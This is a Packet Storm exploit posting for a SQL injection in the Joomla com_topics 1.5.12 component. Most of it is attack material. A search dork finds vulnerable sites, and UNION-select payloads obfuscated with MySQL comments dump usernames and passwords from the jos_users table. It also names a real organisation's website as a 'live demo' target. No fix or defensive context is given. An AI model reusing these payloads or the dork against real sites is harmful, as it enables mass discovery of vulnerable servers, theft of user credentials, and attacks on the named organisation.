Joomla Topics 1.5.12 SQL Injection

2016-07-08T00:00:00
ID PACKETSTORM:137818
Type packetstorm
Reporter xBADGIRL21
Modified 2016-07-08T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla com_topics SQL injection  
# Exploit Author : xBADGIRL21  
# Dork : inurl:index.php?option=com_topics  
# Category: [ Webapps ]  
# version: 1.5.12  
# Tested on: [ Windows ]  
# skype:xbadgirl21  
# Date: 2016/07/08  
# video Proof Youtube : https://youtu.be/2KynoDHvEkY  
######################  
# SQL injection  
######################  
# PoC:  
# [cid=] Get Parameter Vulnerable To SQL  
#  
http://server/index.php?option=com_topics&view=readall&cid=[SQLi]&Itemid=40931&lang=en  
# Demo  
#  
http://server/index.php?option=com_topics&view=readall&cid=5927'&Itemid=40931&lang=en  
# http://server/index.php?option=com_topics&view=readall&cid=-5927  
/*!union*/ select  
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&Itemid=40931&lang=en  
# http://server/index.php?option=com_topics&view=readall&cid=-5927  
/*!union*/ select  
1,2,/*!group_coNcat(username,0x3a,password)*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18  
/*!from*/ jos_users--&Itemid=40931&lang=en  
# Live Demo :  
# http://www.paho.org/hq/  
######################  
# Discovered by : xBADGIRL21  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
`